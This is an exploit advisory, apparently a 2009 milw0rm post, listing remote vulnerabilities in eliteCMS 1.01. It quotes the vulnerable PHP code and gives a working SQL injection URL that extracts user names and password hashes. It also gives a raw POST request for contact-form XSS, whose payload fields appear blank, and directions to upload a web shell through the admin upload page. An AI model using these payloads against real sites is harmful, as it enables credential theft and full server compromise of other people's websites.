# eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulns # by xeno_hive # greets to daganarus, dearest of all my friends. # SQL injection (requires magic_quotes = off) ->/includes/functions.php --------------------------------- 89. function get_page_settings() { ... 92. $query = "SELECT * FROM pages WHERE id = '{$_GET['page']}'"; 93. $result = mysql_query($query); 94. confirm_query($result); 95. $page_settings = mysql_fetch_array($result); 96. return $page_settings; } ... 294. echo $page_settings['title']; --------------------------------- Exploit => index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* then look at browser's title. # XSS (passive) (if contact form is enabled) ->/includes/contact_form.php --------------------------------- 36. $mailTo = $settings['site_email']; 37. $subject = "Feedback email from your eliteCMS website"; 38. $name = $_POST['name']; 39. $sender_email = $_POST['sender_email']; 40. $message = $_POST['message']; ... 54. $sendmail = @mail($mailTo, $subject, $body, $headers); --------------------------------- So attacker can send mail with http tags. --------------------------------- 61. $successMSG = "Thank you dear $name your message has been send successfully."; --------------------------------- And he can insert tags into the page. Exploit => POST-packet --------------------------------- POST /index.php?page=3 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: localhost name= &sender_email=someone@evil.com &message= &email=Send Email --------------------------------- # Admin's file upload script without extension checking Upload your shell at /admin/manage_uploads.php. Then use it at /uploads/shell.php # milw0rm.com [2009-06-01]